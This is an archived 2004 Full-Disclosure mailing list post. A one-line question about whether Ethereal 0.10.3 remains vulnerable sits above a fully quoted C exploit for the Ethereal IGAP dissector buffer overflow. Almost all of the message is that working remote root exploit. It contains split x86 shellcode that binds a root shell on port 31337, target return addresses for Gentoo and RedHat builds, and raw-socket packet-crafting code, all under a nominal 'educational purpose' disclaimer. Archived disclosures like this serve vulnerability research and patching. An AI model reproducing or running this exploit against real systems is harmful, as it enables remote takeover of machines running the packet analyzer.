lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY7-DAV34aDFuXCpU60000f5a7@hotmail.com> From: rlanguy at hotmail.com (Lan Guy) Subject: Ethereal(v0.10.0-0.10.2) IGAP Dissector Message Overflow Exploit is ethereal ver 0.10.3 released 25th March 2004 still vulnerable? Lan Guy ----- Original Message ----- From: "Eye on Security India" <eos-india@...uxmail.org> To: <full-disclosure@...ts.netsys.com> Sent: Sunday, March 28, 2004 1:05 AM Subject: [Full-Disclosure] Ethereal(v0.10.0-0.10.2) IGAP Dissector Message Overflow Exploit > > > /* > * THE EYE ON SECURITY RESEARCH GROUP - INDIA > * Ethereal IGAP Dissector Message Overflow Remote Root exploit > * > * Copyright 2004 - EOS-India Group > * > * Authors note: > * Shellcode splitting technique: > * Due to difficulty involved while following normal exploitation > techniques due to shortage of memory space > * for our shellcode, we used the technique of shellcode splitting. In this > technique one part of the shellcode > * is kept before the buffer which overwrites the saved EIP on stack > followed by a jmp OFFSET instruction which > * jumps EIP to the second half of the shellcode which is kept after return > address. Also since our shellcode > * requires EBP to contain a usuable stack address, we overwrite saved EBP > also. > * > * Disclaimer: > * This code is for educational purpose and testing only. The Eye on > Security Research Group - India, cannot > * be held responsible for any damage caused due to misuse of this code. > * This code is a proof of concept exploit for a serious vulnerability that > exists in Ethereal 0.10.0 to > * Ethereal 0.10.2. > * > * Nilanjan De [n2n+linuxmail.org] - Abhisek Datta [abhisek+front.ru] > * http://www.eos-india.net > * > */ > #define IPPROTO_IGAP 0x02 // IPPROTO_IGMP=0x02 > #define PAYLOAD_SIZE (255-64) > #define MAX_BUFF sizeof(struct igap_header)+sizeof(struct ipheader) > #define EXP "Ethereal(v0.10.0-0.10.2) IGAP Dissector Message Overflow > Exploit" > #define VER "0.2" > #define SOCKET_ERROR -1 > #define MAX_PACKET 10 > #define RETOFFSET 76 > #define SRC_IP "192.31.33.7" > #include <stdio.h> > #include <signal.h> > #include <sys/socket.h> > #include <sys/types.h> > #include <unistd.h> > #include <signal.h> > #include <netdb.h> > > #define MAX_ARCH 5 > struct eos{ > char *arch; > unsigned long ret; > } targets[] = { > "tEthereal(0.10.2)-Gentoo(gdb)", > 0xbffede50, > //------------------------------- > "tEthereal(0.10.2)-Gentoo ", > 0xbffede10, > //------------------------------- > "Ethereal(0.10.2)-Gentoo ", > 0xbfffd560, > //------------------------------- > "tEthereal(0.10.2)-RedHat 8 ", > 0xbffedfb8, > //------------------------------- > "Ethereal(0.10.2)-RedHat 8 ", > 0xbfffcd08, > //------------------------------- > NULL, > 0 > }; > > > /* > x86 linux portbind a shell in port 31337 > based on shellcode from www.shellcode.com.ar > with a few modifications by us > */ > > char shellcode_firsthalf[]= > /* sys_fork() */ > "\x31\xc0" // xorl %eax,%eax > "\x31\xdb" // xorl %ebx,%ebx > "\xb0\x02" // movb $0x2,%al > "\xcd\x80" // int $0x80 > "\x38\xc3" // cmpl %ebx,%eax > "\x74\x05" // je 0x5 > /* sys_exit() */ > "\x8d\x43\x01" // leal 0x1(%ebx),%eax > "\xcd\x80" // int $0x80 > /* setuid(0) */ > "\x31\xc0" // xorl %eax,%eax > "\x31\xdb" // xorl %ebx,%ebx > "\xb0\x17" // movb $0x17,%al > "\xcd\x80" // int $0x80 > /* socket() */ > "\x31\xc0" // xorl %eax,%eax > "\x89\x45\x10" // movl > %eax,0x10(%ebp)(IPPROTO_IP = 0x0) > "\x40" // incl %eax > "\x89\xc3" // movl %eax,%ebx(SYS_SOCKET = > 0x1) > "\x89\x45\x0c" // movl > %eax,0xc(%ebp)(SOCK_STREAM = 0x1) > "\x40" // incl %eax > "\x89\x45\x08" // movl %eax,0x8(%ebp)(AF_INET = > 0x2) > "\x8d\x4d\x08" // leal 0x8(%ebp),%ecx > "\xb0\x66" // movb $0x66,%al > "\xcd\x80" // int $0x80 > "\x89\x45\x08" // movl %eax,0x8(%ebp) > ; > char jumpcode[]="\xeb\x10"; > > char shellcode_secondhalf[]= > /* bind()*/ > "\x43" // incl %ebx(SYS_BIND = 0x2) > "\x66\x89\x5d\x14" // movw %bx,0x14(%ebp)(AF_INET = > 0x2) > "\x66\xc7\x45\x16\x7a\x69" // movw $0x697a,0x16(%ebp)(port=31337) > "\x31\xd2" // xorl %edx,%edx > "\x89\x55\x18" // movl %edx,0x18(%ebp) > "\x8d\x55\x14" // leal 0x14(%ebp),%edx > "\x89\x55\x0c" // movl %edx,0xc(%ebp) > "\xc6\x45\x10\x10" // movb > $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16) > "\xb0\x66" // movb $0x66,%al > "\xcd\x80" // int $0x80 > > /* listen() */ > "\x40" // incl %eax > "\x89\x45\x0c" // movl %eax,0xc(%ebp) > "\x43" // incl %ebx > "\x43" // incl %ebx(SYS_LISTEN = 0x4) > "\xb0\x66" // movb $0x66,%al > "\xcd\x80" // int $0x80 > > /* accept() */ > "\x43" // incl %ebx > "\x89\x45\x0c" // movl %eax,0xc(%ebp) > "\x89\x45\x10" // movl %eax,0x10(%ebp) > "\xb0\x66" // movb $0x66,%al > "\xcd\x80" // int $0x80 > "\x89\xc3" // movl %eax,%ebx > > /* dup2() */ > "\x31\xc9" // xorl %ecx,%ecx > "\xb0\x3f" // movb $0x3f,%al > "\xcd\x80" // int $0x80 > "\x41" // incl %ecx > "\x80\xf9\x03" // cmpb $0x3,%cl > "\x75\xf6" // jne -0xa > > /* execve() */ > "\x31\xd2" // xorl %edx,%edx > "\x52" // pushl %edx > "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e > "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f > "\x89\xe3" // movl %esp,%ebx > "\x52" // pushl %edx > "\x53" // pushl %ebx > "\x89\xe1" // movl %esp,%ecx > "\xb0\x0b" // movb $0xb,%al > "\xcd\x80"; // int $0x80 > > struct ipheader { > unsigned char ip_hl:4, ip_v:4; > unsigned char ip_tos; > unsigned short int ip_len; > unsigned short int ip_id; > unsigned short int ip_off; > unsigned char ip_ttl; > unsigned char ip_proto; > unsigned short int ip_sum; > unsigned int ip_src; > unsigned int ip_dst; > }; > > struct igap_header { // This is a malformed header which does not conforms > with IGAP RFC > unsigned char igap_type; // Message Type > unsigned char igap_restime; // Response Time > unsigned short int igap_cksum; // IGAP Message Checksum > unsigned int igap_gaddr; // Group Address > unsigned char igap_ver; // Version > unsigned char igap_stype; // SubType > unsigned char igap_reserved1; // Reserved > unsigned char igap_cid; // Challenge ID > unsigned char igap_asize; // Account Size > unsigned char igap_msgsize; // Message Size > unsigned short int igap_reserved2; // Reserved > /* > unsigned char igap_uaccount[16];// User Account > unsigned char igap_message[64] // Message > */ > unsigned char igap_payload[16+64+PAYLOAD_SIZE]; // This buffer will > contain payload, here we differ from RFC by sending a bigger message. > }; > > unsigned short checksum(unsigned short *buf,int nwords) > { > unsigned long sum; > for (sum = 0; nwords > 0; nwords--) > sum += *(buf)++; > sum = (sum >> 16) + (sum & 0xffff); > sum += (sum >> 16); > return ~sum; > } > > void showhelp(char *pr00gie) { > int i=0; > printf("######### The Eye on Security Research Group - India ########\n"); > printf("%s %s\n",EXP,VER); > printf("abhisek[at]front[dot]ru - n2n[at]linuxmail[dot]org\n"); > printf("http://www.eos-india.net\n\n"); > printf("[usage]\n"); > printf("%s [Remote Host] [Target]\n",pr00gie); > printf("[Available Targets]\n"); > while(targets[i].arch != NULL) { > printf("%d. - %s\t - %p\n",(i),targets[i].arch,targets[i].ret); > i++; > } > exit(1); > } > > int main(int argc,char *argv[]) { > char buffer[MAX_BUFF]; > struct ipheader *iphdr=(struct ipheader*)buffer; > struct igap_header *igaphdr=(struct igap_header*)(buffer+sizeof(struct > ipheader)); > int sockfd; > unsigned long addr; > int one=1; > int i; > const int *val=&one; > struct sockaddr_in sin; > unsigned long magic; > unsigned int n; > > if(getuid()) { > printf("- This code opens SOCK_RAW which needs root privilege\n"); > exit(1); > } > if(argc != 3) > showhelp(argv[0]); > n=atoi(argv[2]); > if(n >= MAX_ARCH) { > printf("- Invalid target\n"); > showhelp(argv[0]); > } > magic=targets[n].ret; > printf("-Using RET %p\n",magic); > addr=inet_addr(argv[1]); > if(addr==INADDR_NONE) { > printf("- Invalid target\n"); > exit(1); > } > sin.sin_addr.s_addr=addr; > sin.sin_family=AF_INET; > sin.sin_port=0x00; > sockfd=socket(PF_INET,SOCK_RAW,IPPROTO_RAW); > if(sockfd==SOCKET_ERROR) { > printf("- Failed creating SOCK_RAW descriptor\n"); > exit(1); > } > if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one)) < 0) > printf ("- WARNING !! :Cannot set IP_HDRINCL!\n"); > memset(buffer,0x00,MAX_BUFF); > // Filling IP Header > iphdr->ip_hl=0x05; > iphdr->ip_v=0x04; > iphdr->ip_tos=0x00; > iphdr->ip_len=MAX_BUFF; > iphdr->ip_id=htonl(54321); > iphdr->ip_off=0x00; // Lower 3 bit=Flag4Fragmentation - Higher 13 > Bit=Fragment Offset > iphdr->ip_ttl=0x01; > iphdr->ip_proto=IPPROTO_IGAP; // IPPROTO_IGMP > iphdr->ip_sum=0x00; // Fill sum before sending packet > iphdr->ip_src=inet_addr (SRC_IP); > iphdr->ip_dst=addr; > // Filling IGAP Header > igaphdr->igap_type=0x41; // IGAP Membership Query > igaphdr->igap_restime=0x0a; // > igaphdr->igap_cksum=0x00; // compute before sending packet > igaphdr->igap_gaddr=0x00; // Ignored in IGAP Membership Query Message > igaphdr->igap_ver=0x01; // IGAPv1 > igaphdr->igap_stype=0x21; // Basic Query > igaphdr->igap_reserved1=0x00; // Ignored > igaphdr->igap_cid=0x00; // Challenge ID (ignored because Chanllenge > Response authentication not used) > igaphdr->igap_asize=0x10; // MAX Size of Account Name Field > igaphdr->igap_msgsize=0x40+PAYLOAD_SIZE; // Size of Message > igaphdr->igap_reserved2=0x00; // Reserved > // Building exploit buffer > //for(i=0;i<16+64+PAYLOAD_SIZE;i++) > // memset(igaphdr->igap_payload+i,(unsigned char)i,1); > memset(igaphdr->igap_payload,0x90,16+64+PAYLOAD_SIZE); > memcpy(igaphdr->igap_payload+16+RETOFFSET-strlen(shellcode_firsthalf)-8,shellcode_firsthalf,strlen(shellcode_firsthalf)); > memcpy(igaphdr->igap_payload+16+64+RETOFFSET-strlen(jumpcode)-4,jumpcode,strlen(jumpcode)); > memcpy(igaphdr->igap_payload+16+64+RETOFFSET,&magic,4); > magic-=0x10; > memcpy(igaphdr->igap_payload+16+64+RETOFFSET-4,&magic,4); > memcpy(igaphdr->igap_payload+16+64+PAYLOAD_SIZE-strlen(shellcode_secondhalf)-1,shellcode_secondhalf,strlen(shellcode_secondhalf)); > // Calculating checksum > igaphdr->igap_cksum=checksum((unsigned short*)(buffer+sizeof(struct > ipheader)),(sizeof(struct igap_header))>>1); > iphdr->ip_sum = checksum ((unsigned short*)buffer,(iphdr->ip_len)>>1); > // Sending > one=MAX_PACKET; > while(one) { > sendto(sockfd,buffer,MAX_BUFF,0,(struct sockaddr*)&sin,sizeof(sin)); > printf("."); > one--; > } > close(sockfd); > printf("\n- Send %d packets to %s\n",MAX_PACKET,argv[1]); > printf("- Read source to know what to do to check if the exploit > worked\n"); > return 0; > } > > -- > ______________________________________________ > Check out the latest SMS services @ http://www.linuxmail.org > This allows you to send and receive SMS through your mailbox. > > > Powered by Outblaze > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html >
Powered by blists - more mailing lists